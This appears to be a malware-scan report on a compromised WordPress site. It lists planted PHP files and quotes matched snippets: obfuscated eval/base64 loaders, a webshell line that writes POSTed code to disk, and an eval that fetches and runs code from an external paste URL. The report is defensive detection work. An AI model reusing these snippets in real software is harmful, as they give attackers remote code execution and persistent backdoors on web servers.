| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/WRiZdajECck.php Size: 38.68 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/theme-insimyx.php Size: 338.00 B Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/network/wp-term.php Size: 335.00 B Created: 2024-06-01 02:41:01 Modified: 2024-06-01 08:12:22 Warns: 1
| Description | Match |
|---|
Function eval Line: 15 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("$ok" . get('https://paste.myconan.net/495929.txt'))
|
|
/custdata02/turtle/public_html/wp-admin/network/wp/iXxBc.php Size: 2.47 kB Created: 2024-06-01 06:19:57 Modified: 2024-06-01 08:12:22 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Line: 60 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval('?>' . $a)
| Sign 11413268 Line: 60 Dangerous Malware Signature (hash: 11413268) | <?php eval('?>
|
|
/custdata02/turtle/public_html/wp-admin/network/theme-insxbkl.php Size: 338.00 B Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/network/theme-insltcm.php Size: 341.00 B Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/nykq7LRZemH.php Size: 44.05 kB Created: 2024-06-01 02:24:24 Modified: 2024-06-01 08:12:22 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($YMAes($BViZn($uHQOv('==wOpkSKpkSKpkSKpkSKpkSKpkSKpkSKdhDMwADMrBzWdNKxbZUWO9kQZRFJogkQt9WWJ1ESYdzUhFXUBVUWV9FK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmc9tTKpkSKaF3bYF1XkgiWmN3afhybHNVOwMnRfRCKydmb5NXY21GdokmclV2ZmBSYlh2ZyV2Ovd0U5AzcG9FJ552bilHd7gXWLx2a5Y2TfRSeu9mY5R3epoVcvhVUfRCKIJUbvlVSNhEW3MVYxFVQFlVVfBSYiZ3ZwFGaztTX3ADMwsGMb11oEvlRZ50TClFVk0zbHNVOwMnRfRyOdZDMwsGMb11oEvlRZ50TClFVk0DeZtEbrljZP9FJ9tTYy...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/zfcecyiyn.php Size: 166.77 kB Created: 2024-06-03 08:47:23 Modified: 2024-06-03 08:47:23 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/wp-admin/prsuwyvc.php Size: 15.07 kB Created: 2024-06-03 23:44:56 Modified: 2024-06-03 23:44:56 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtduPDVW1NMQUJPTEckKE45ZFU0RnlLdG9wUUpRckptRF8obGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmV9OykpKSl6dm5yQWY3U2lfJChUOWVPXyhIUFU1Y01yXyQoZXRhbGZuaXpnKHZlcnJ0cyBucnV0ZXI7SFBVNWNNcl8kbGFib2xnO0JUYTdNXyRsYWJvbGd7KXp2bnJBZjdTaV8kKE45ZFU0RnlLdG9wUUpRckptRF8gbm9pdGNudWY7XTcwMDB4MFtduPDVW1NMQUJPTEckPUhQVTVjTXJfJDtdNjAweDBbXbjw1VtTTEFCT0xHJD1CVGE3TV8kfTthWWQyc18kIG5ydXRlcjspKSldNTB4MFtduPDVW1N...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($ImBdO($mjPQZ('OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtduPDVW1NMQUJPTEckKE45ZFU0RnlLdG9wUUpRckptRF8obGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmV9OykpKSl6dm5yQWY3U2lfJChUOWVPXyhIUFU1Y01yXyQoZXRhbGZuaXpnKHZlcnJ0cyBucnV0ZXI7SFBVNWNNcl8kbGFib2xnO0JUYTdNXyRsYWJvbGd7KXp2bnJBZjdTaV8kKE45ZFU0RnlLdG9wUUpRckptRF8gbm9pdGNudWY7XTcwMDB4MFtduPDVW1NMQUJPTEckPUhQVTVjTXJfJDtdNjAweDBbXbjw1VtTTEFCT0xHJD1CVGE3TV8kfTthWWQyc18kIG5ydXRlcjsp...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/ugwqqzxt.php Size: 19.06 kB Created: 2024-06-03 23:45:11 Modified: 2024-06-03 23:45:11 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($Shgrt($sJhXG($LNuWx($DesQW('rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...
| Function str_rot13 eval_str_rot13 Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php RinY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/function.php Size: 14.78 kB Created: 2022-03-06 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1
| Description | Match |
|---|
Sign 00f56a27 Line: 80 Dangerous Malware Signature (hash: 00f56a27) | <?php $___ =
|
|
/custdata02/turtle/public_html/wp-admin/zwkkltwb.php Size: 15.21 kB Created: 2024-06-04 09:52:11 Modified: 2024-06-04 09:52:11 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDBrMFtduPDVW0ZZTk9CWVQkKEE5cUg0U2xYZ2JjRFdEZVd6UV8oeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXJ9OykpKSltaWFlTnM3RnZfJChHOXJCXyhVQ0g1cFplXyQocmdueXNhdm10KGlyZWVnZiBhZWhncmU7VUNINXBaZV8keW5vYnl0O09HbjdaXyR5bm9ieXR7KW1pYWVOczdGdl8kKEE5cUg0U2xYZ2JjRFdEZVd6UV8gYWJ2Z3BhaHM7XTcwMDBrMFtduPDVW0ZZTk9CWVQkPVVDSDVwWmVfJDtdNjAwazBbXbjw1VtGWU5PQllUJD1PR243Wl8kfTtuTHEyZl8kIGFlaGdyZTspKSldNTBrMFtduPDVW0Z...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($BtYIG($HJEKh($BINAc('OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDBrMFtduPDVW0ZZTk9CWVQkKEE5cUg0U2xYZ2JjRFdEZVd6UV8oeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXJ9OykpKSltaWFlTnM3RnZfJChHOXJCXyhVQ0g1cFplXyQocmdueXNhdm10KGlyZWVnZiBhZWhncmU7VUNINXBaZV8keW5vYnl0O09HbjdaXyR5bm9ieXR7KW1pYWVOczdGdl8kKEE5cUg0U2xYZ2JjRFdEZVd6UV8gYWJ2Z3BhaHM7XTcwMDBrMFtduPDVW0ZZTk9CWVQkPVVDSDVwWmVfJDtdNjAwazBbXbjw1VtGWU5PQllUJD1PR243Wl8kfTtuTHEyZl8kIGFla...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/item.php Size: 31.56 kB Created: 2022-04-05 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Line: 9 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxCR3BCvfdIHB...
| Function eval Line: 9 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(Ccll("5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxC...
| Sign e996cf12 Line: 3 Dangerous Malware Signature (hash: e996cf12) | <?php $DEV=gzinflate(base64_decode($DEV));
for($i=0;$i<strlen($DEV);$i++)
{
$DEV[$i] = chr(ord($DEV[$i])-1);
}
return $DEV;
}eval(Ccll(
|
|
/custdata02/turtle/public_html/wp-admin/unZIPpeRlqp.php Size: 24.22 kB Created: 2024-06-04 09:52:40 Modified: 2024-06-04 09:52:40 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+6TC2ixLtsjW6AchJYeBhehAEnq/XDZ4Um...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($gqsmw($XIJCA($oxXtM($kAzSn('Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+...
| Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php CeXE
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/wxsctlwm.php Size: 14.61 kB Created: 2024-06-04 16:34:32 Modified: 2024-06-04 16:34:32 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'gKcyoS7OxdJM2L6MzqzBzMxMCmCR/WzMzMx+fk3oZGCSmZmfzWzMXqz89+oAnTqUJzzy7E/3qyIKaGc1ed7HYGJcuoZm0AaV2pVE6Bkd7sPAIgWVIRUOHAWVFIyQIylFwg/pjgYnjLXJMhzzwLnEyBnwzLnBa1WnDIyZIRSq/6/GtSFD1ZYG0D5b/wsVS9VK3Os8o9j3o2fUFmfGIjgnSmqGS1qaJudFTQvjsj4RWgPXD9HfhBFKD2N/cY1Itiu1I4/Rjko/+Zt3OjsmAJZ7rXskYIf2AlpXn47sk/y/KxrhmjBRujV+OLht3xGU/hFYOlGVkB/EOzZROYl3ddcpoF9jevS83S93wcM2iivZhF6XyBGdnyqZzHm4/VPckqmBouY6rp6CL3a/TVyDcCAmy/Q7UCZfaTlBw/JYVRKr9iu16KpNQK8Y4+6OH+viO08KFyGbjhMDxqG4fTmCNT2OrAI8Uz2FvJRdVj6Mq5x8LytNwr62OrW...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($UdNLr($UtTAl($iTtOf('gKcyoS7OxdJM2L6MzqzBzMxMCmCR/WzMzMx+fk3oZGCSmZmfzWzMXqz89+oAnTqUJzzy7E/3qyIKaGc1ed7HYGJcuoZm0AaV2pVE6Bkd7sPAIgWVIRUOHAWVFIyQIylFwg/pjgYnjLXJMhzzwLnEyBnwzLnBa1WnDIyZIRSq/6/GtSFD1ZYG0D5b/wsVS9VK3Os8o9j3o2fUFmfGIjgnSmqGS1qaJudFTQvjsj4RWgPXD9HfhBFKD2N/cY1Itiu1I4/Rjko/+Zt3OjsmAJZ7rXskYIf2AlpXn47sk/y/KxrhmjBRujV+OLht3xGU/hFYOlGVkB/EOzZROYl3ddcpoF9jevS83S93wcM2iivZhF6XyBGdnyqZzHm4/VPckqmBouY6rp6CL3a/TVyDcCAmy/Q7UCZfaTlBw/JYVRKr9iu16KpNQK8Y4+6OH+viO08KFyGbjhMDxqG4fTmCNT2OrAI8U...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/cvburjic.php Size: 19.06 kB Created: 2024-06-04 16:35:54 Modified: 2024-06-04 16:35:54 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($Shgrt($sJhXG($LNuWx($DesQW('rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...
| Function str_rot13 eval_str_rot13 Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php RinY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/weuponfc.php Size: 14.74 kB Created: 2024-06-04 16:38:38 Modified: 2024-06-04 16:38:38 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'tW1yeV7BkqWZ2Y6ZmdmOmZkZPzPE/JmZmZk+sx3bMTPFzMzsmJmZKdm89+bNdXRUTXal7R/3aUhKnTporq7ULTWphbMz0NnI2cIR6Ox37fCNSdJVR07BQ9JVVkxQSVySjt/cwtLawYKWc+mmjYaRlOajmYaOn0VNTkxZR05d/6/TgEeQ1MLT0Q51/jfIF9IX3Bf8Ytw3YngHWDsTSgtNFzdGF0p0TRqSGDiwfw4EJtCKUNUsuOSXUGA/pL1IgvhoSo/Ewxb/+Mg3BwfzNXA7a6fxLVs2NycKeI7fx/l/XlSuzwOEhwI+BYug3lHH/uSLByTIxO/RBnAEBLy3qqpcei9jriF83F9qjpZpvviMuS6KlOTqd0pZmVn4/ICpxdzOYRL6bM6PcGz/GIlDpPNml/D7HPMsnHmOj/WLIFLe9vho6WoADX8L4+6BRuivB0IXV0fowuZDkdT4sHnPAHqBa9V8HnqSiW4qIw6Zapk8b0sAje62BeJ...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($mTvIU($XCjpW($IczxX('tW1yeV7BkqWZ2Y6ZmdmOmZkZPzPE/JmZmZk+sx3bMTPFzMzsmJmZKdm89+bNdXRUTXal7R/3aUhKnTporq7ULTWphbMz0NnI2cIR6Ox37fCNSdJVR07BQ9JVVkxQSVySjt/cwtLawYKWc+mmjYaRlOajmYaOn0VNTkxZR05d/6/TgEeQ1MLT0Q51/jfIF9IX3Bf8Ytw3YngHWDsTSgtNFzdGF0p0TRqSGDiwfw4EJtCKUNUsuOSXUGA/pL1IgvhoSo/Ewxb/+Mg3BwfzNXA7a6fxLVs2NycKeI7fx/l/XlSuzwOEhwI+BYug3lHH/uSLByTIxO/RBnAEBLy3qqpcei9jriF83F9qjpZpvviMuS6KlOTqd0pZmVn4/ICpxdzOYRL6bM6PcGz/GIlDpPNml/D7HPMsnHmOj/WLIFLe9vho6WoADX8L4+6BRuivB0IXV0fowuZDkdT4sHnPAHqBa9V8H...
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) | <?php zdGF0
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/unZIPpeRoax.php Size: 24.22 kB Created: 2024-06-04 16:39:06 Modified: 2024-06-04 16:39:06 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+6TC2ixLtsjW6AchJYeBhehAEnq/XDZ4Um...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($gqsmw($XIJCA($oxXtM($kAzSn('Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+...
| Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php CeXE
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/Bv96MsLSZ2o.php Size: 44.01 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($Krnoa($wosLc($IlNAn('==jBcxFXcxFXcxFXcxFXcxFXcxFXcxFXquQZjNQZ4OmJqAXkoASGOW0GZqRWbH1G6WTGJcIIYqwEhETEBWSGV9SXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKM9gGXcxFXAEzLYE0KxtFGmMTrsuvLHMHBjL2HsEPXyEKLfMzocc3MbLKMlWUqmOvolIUqyW3BvEyE5NwMG9SWfSzLik2M7fTGLyUr5ZaDsEPouW2ofq2rc0RMvgREsEPXI9xrvkxInI1F3LxoxExGFkRFsOvoiyTqw5JqzgGK3NQZjtUZo11bRi1HZSxDCk0Ex0wLHMHBjL2HsElBqMQZjtUZo11bRi1HZSxDCk0Ex0mnZuIr4ympP9SW9gwoy...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php NvcH
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/zfcpvqrnd.php Size: 166.78 kB Created: 2024-06-04 19:57:41 Modified: 2024-06-04 19:57:41 Dangers: 2
| Description | Match |
|---|
